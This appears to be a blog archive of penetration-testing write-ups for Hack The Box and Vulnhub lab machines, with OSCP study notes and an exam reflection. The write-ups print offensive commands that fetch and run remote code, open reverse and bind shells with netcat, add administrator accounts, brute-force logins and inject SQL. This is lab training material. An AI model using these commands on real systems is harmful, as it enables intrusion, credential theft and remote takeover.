Posts

Showing posts from December, 2020

HTB Traverxec

Image
Lessons Learned If user directories are hosted on a website, the usual syntax is /~amanda Minimize a window for priv esc is an attack. Ippsec stty method After doing a nmap scan, we see port 22 and 80 is open. Looking around the website, I see the banner nostromo 1.9.6. Thats different than the usual Apache or Nginx. I look it up in SearchSploit and see a Remote Code Exectuion exploit exists. Ippsec method for better shell: -- Gives you tab autocomplete -- CTRL Z stty raw -echo Type fg ENTER, HIT it TWICE -- Gives you tab autocomplete -- export TERM=xterm (now you can clear the screen) I run linpeas and see it highlighted the /var/nostromo/conf/.htpasswd file that contains "david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/" The hash matches format 500. I will use that in hashcat. Strange Priv Esc /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service Run the command up above. Minimize your terminal window. . This will bring ...

Vulnhub Vulnpix

Image
Lessons Learned https://blog.christophetd.fr/write-up-vulnix/ If an NFS is version 3, you can read UID and GID (user id and group id). If you make a user with the correct UID and GID, they can access and write to the share. We see the UID and GID is 2008. We must add that. root@kali:~# groupadd --gid 2008 vulnix_group root@kali:~# useradd --uid 2008 --groups vulnix_group tester root@kali:~# su - tester

HTB OpenAdmin

Image
Lessons Learned curl -x "127.0.0.1:8080" http://www.google.com (Send to Burp Suite) Another way to get shell curl http://10.10.14.9/test.py | python3 find / -user jimmy -ls 2>/dev/null Rec File: nc -l -p 1234 > out.file. Send File: nc 10.10.14.9 1234 sudo /usr/share/john/ssh2john.py joanna.rsa > crack.txt sudo john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt Walkthrough This was a pretty rough box where I learned a lot. The shell is odd. You'll have to grap some python code from PayloadAlltheThings and use curl piped with python3. Use the password: n1nj4W4rri0R! to SSH into jimmy's account You can do this one of two ways. ONE is using curl inside the box. TWO is local port forwarding. The concept of the box is to show comparing == in PHP is wrong. It should be ===, not ==. You must find a word that starts with the SHA512 hash of 0e. Revealed fits the requirement. Take the id_rsa of Joanna and use th...

0 to 65: Failing my OSCP Exam on the First Attempt

Image
I sat for my OSCP exam on Tuesday December 15, 2020. I started at 11am and ended at 10:45am Wednesday. I slept for 1 hour. Timeline Name Points Time Buffer Overflow 25 1:20 minutes Windows Easy 10 50 minutes Windows Medium 20 30 minutes for user. 1.5 hours for priv esc. Linux Medium 20 30 minutes for local.txt. No interactive shell. Linux Hard 25 Admin access to program. No local or root. Total 65 points Outcome I rooted 3 boxes and obtained local.txt on one. I'm very happy with the outcome. I started studying for the OSCP in late July. If I took the exam in July, I would've got 0 points. I improved by 65 points! My first goal was to not look like a fool during the exam. I was a real deal contender! Before I committed to the OSCP, I even wondered if I was smart enough to handle it. Failing the OSCP exam at 65 points is my...

September OSCP Notes

Image
September 7, 2020 https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.200.162 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00" September 8, 2020 windows/smb/psexec service_exec(conn, r'cmd /c net user amanda password /add') service_exec(conn, r'cmd /c net localgroup Administrators amanda /add') service_exec(conn, r'reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f') https://pastebin.com/Qqq7zeJ6 locate smbexec.py ./smbexec.py amanda:password@10.11.1.227 locate psexec.py locate mssqlclient.py September 9, 2020 Stuck? try nikto sudo hydra -l dj -P /usr/share/wordlists/rockyou.txt 10.11.1.128 -s 4167 http-post-form "/loginform.asp:uname=^USER^&psw=^PASS^:Internal server error." September 10, 2020 Read for later - http://futureoscp.blogspot.com/2017/10/usefull-o...

HTB - Nibbles

Image
Port 22 and 80 is open. We see /nibbleblog in the view source. Use dirbuster for http://10.10.14.2/nibbleblog/. We find the /admin directory and login as admin:nibbles. Get shell by following this: https://wikihak.com/how-to-upload-a-shell-in-nibbleblog-4-0-3/

HTB - Bounty web.config bind shell

Image
Walkthrough First I do a nmap scan on Bounty. Port 80 is open. We notice transfer.aspx and UploadedFiles exist. We cannot upload .asp or .aspx extensions. Lets try web.config and use this bind shell. The web.config will be deleted within 1-4 minutes after you upload. Quicky use netcat to get a shell on the box. certutil -f -urlcache http://10.10.14.2/nc.exe C:\temp\nc.exe C:\temp\nc.exe 10.10.14.2 53 -e C:\Windows\System32\cmd.exe The usual 4444 will not work. Use ports 53 or 443 instead. Use JuicyPotato.exe for privilege escalation.

HTB - Silo Oracle

Image
Walkthrough We see port 1521 is open with the banner Oracle. Lets use /opt/odat.py to find out more. Step 1 - Find a valid SID python3 odat.py sidguesser -s 10.10.10.82 -p 1521 odat finds that XE and XEDB are valid SIDs. Lets use XE. Step 2 - Bruteforce the Username and Password python3 odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file userpass.txt The userpass.txt file can be found here Step 3 - Login as scott/tiger sqlplus64 scott/tiger@10.10.10.82:1521/XE sqlplus64 scott/tiger@10.10.10.82:1521/XE as sysdba ^ as sysdba is like sudo. Commands below to check privs SELECT * FROM Session_privs; SELECT * FROM User_Role_privs; Step 4 - Read File set serveroutput on Make sure serveroutput is on or nothing will show. declare f utl_file.file_type; s varchar(200); begin f := utl_file.fopen('/inetpub/wwwroot', 'iisstart.htm', 'R'); utl_file.get_line(f,s); utl_file.fclose(f); dbms_output.put_line(s);...

HTB - Jarvis MySQL

Image
Brad Traversy MySQL CheatSheet PentestMonkey SQL CheatSheet MySQL Statement Architecture Jarvis Walkthrough Step 1 - Try to make your query. Visualize it. SELECT Id, Name, Rating, Picture, Cost, Description, UNKNOWN7Field FROM Room WHERE Id = 1 Queries don't need a " or ' Keep going up until it works http://10.10.10.143/room.php?cod=3 union select 1,2,3,4 http://10.10.10.143/room.php?cod=3 union select 1,2,3,4,5 http://10.10.10.143/room.php?cod=3 union select 1,2,3,4,5,6 http://10.10.10.143/room.php?cod=3 union select 1,2,3,4,5,6,7 -OR- http://10.10.10.143/room.php?cod=3 order by 1,2,3,4,5,6,7 The union select works when the left and right are equal in column size. If the left has 7 selections, the right needs 7 selections too SELECT Id, Rating, Name, Cost, Description, UNKNOWN6 FROM Room WHERE Id = 1 UNION SELECT 1,2,3,4,5,6 In order to shift to the right side, put in a faulty value for 1 like negative 1 or 9999 SELECT Id, Rating, Name, Co...